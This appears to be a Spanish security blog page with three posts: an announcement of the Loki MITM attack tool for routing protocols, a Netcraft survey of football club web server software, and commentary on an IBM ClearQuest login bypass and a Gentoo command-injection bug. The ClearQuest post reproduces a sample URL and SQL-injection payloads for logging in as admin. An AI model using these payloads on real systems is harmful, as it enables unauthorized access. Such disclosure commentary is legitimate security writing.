Loki está libre

Una de las charlas que más me gustó en Black Hat USA 2010 fue la de los ataques Man in The Middle en protocolos de comunicaciones por medio de Loki. Esta herramienta es hija de Dani Mende, miembro de ENRW, la empresa que hostea la fantástica conferencia Troopers en Alemania.

La herramienta es un entorno de ataques mitm para algunos protocolos de red muy comunes, como OSPF, RIP, VRRP o EIGRP. En ella, una de las cosas que más se ha depurado ha sido el interfaz de usuario. A pesar de que en la presentación usaron un chiste con GUI (Girls Use Interfaces), la tool, que sólo está disponible para sistemas Linux (Ubuntu, Gentoo), tiene un cuidado y organizado interfaz para que su utilización sea muy cómoda.

Ahora ya está disponible y es posible acceder a la presentación, los ejecutables y el código fuente de la herramienta desde la página web de ENRW. Dentro de la página web hay publicados unos vídeos con las demos de ataques a OSPF, VRRP y EIGRP que os he subido a Youtube para que podáis verlos de un plumazo.

Saludos Malignos!

WebServers en la Fortune 20

***********************************************************
Este informe se hizo utilizando Site Report de Netcraft y no ofrece resultados actuales. A pesar de que toda la información que se muestra aquí en algún momento ha sido real, es neceseario actualizar los datos. Valga el siguiente POST para reforzar esto.
***********************************************************


Aprovechando que se acabó la pretemporada y comienza la Liga 2007/2008, el presente post recoge, a modo de curiosidad, los datos devueltos por los servidores web que utilizan los equipos de la Primera División Española de Futbol, que aquí llamaremos la "Fortune 20". Para ello se han utilizado los servicios de NetCraft "What's that site running?" para obtener la información.

Tabla de Datos

Figura 1: Lista de datos obtenidos
Todos los sitios a excepción de la web del Real Zaragoza han mostrado el banner del servidor Web. No obstante, se ha asumido que es un Apache con un alto grado de certidumbre teniendo el cuenta, en primer lugar la historia del sitio web y en segundo lugar el formato de los mensajes de error. Como se puede ver, en los datos, lo más utilizado en los sitios web de los equipos de futbol de primera división es el duo Windows 2000 Server / Internet Information Services 5.0. Real Madrid es el único sitio que utiliza Solaris y Netscape y el Real Zaragoza el único que utiliza que "parece" utilizar Apache sobre Windows. La web del Sevilla se ha supuesto un Linux sobre Fedora o RedHat atendiendo al hosting que tiene contratado que oferta esas dos versiones de Linux.

Sevidores Web

La siguiente tabla agrupa los datos de los servidores Web por versiones y familias:

Figura 2: Tabla resumen de Servidores Web
Como se ve en la tabla, Internet Information Services 5 es el servidor Web más utilizado, mientras que por familias es la familia de Spectra quién se lleva la mayoría absoluta. Apache es la segunda alternativa con un 40 % mientras que Realmadrid.com es la referencia de Netscape en la "Fortune 20". Visualmente se puede ver en los siguientes gráficos:

Figura 3: Gráficos resumen Servidores Web
Sistemas Operativos

La siguiente tabla agrupa los datos de los Sistemas Operativos por versiones y familias:

Figura 4: Tabla resumen de Sistemas Operativos
Como se aprecia la familia Windows es la más utilizada siendo Windows 2000 Server la versión más utilizada. En el caso de las alternativas UNIX/Linux se nota una gran dispersión con versiones de Solaris, Debian, Gentoo, Ubuntu y Fedora/RedHat entre otras.Visualmente se puede ver en los siguientes gráficos:

Figura 5: Gráficos resumen de Sistemas Operativos

Qué Gente!

Hoy es sábado y no me apetece ser muy malo ni tener mucha guerra, pero...un poco sí.

Revisando los últimos exploits me encuentro con este:

IBM Rational ClearQuest Web Login Bypass (SQL Injection)

SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE

Log in as "admin":
==================

' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...

Tras la cagada de "Como comerse una comilla" siempre piensas, que esa es un buena cagada, pero que IBM se coma una comilla en el campo USERNAME de un formulario de login indica el número de pruebas que le han hecho a este producto de seguridad: EXACTEMANTE Cero mil cero cientas cero cero o dicho de otra forma, en binario 0000000.

La otra cagadita del día, ha sido la de Gentoo, que me ha encantado, en este caso el Bug#: 187971

Gentoo Website Command Injection Issue

El problema está en que no está bien filtrado y se hace una llamada a exec por lo que basta con poner un ";" y ejecutar cualquier otra instrucción en el sistema operativo. Una Injección de comandos remota.

Cuando esto se hace público rápidamente el progrmador busca una solución y se la postea a los colegas porque

"Sorry I am out of town and don't have access to Gentoo servers"

pero se lo curra y ofrece una solución:

for the resolution, the solution should be something more to the effect:

[!--#exec cmd="export QUERY_STRING;./similar.py" --]

No obstante, luego recapacita y se da cuenta de "ups!, yo creo que esto lo he hecho más veces!". Y vuelve a postear:

Oh, forgot to mention... they /similar page is not the only one where "exec
cmd" is used. So this will have to be fixed in all occurrences. They're all
found in mksite.py though.

Al final, se optó por tirar abajo los servidores hasta que regresaran de las conferecias, y luego lo explicaron.

¿Serían conferencias sobre seguridad? ¿Auditoría de código? ¿Testing? ¿Planes de respaldo? ¿Gestión de CPD? ¿downtime?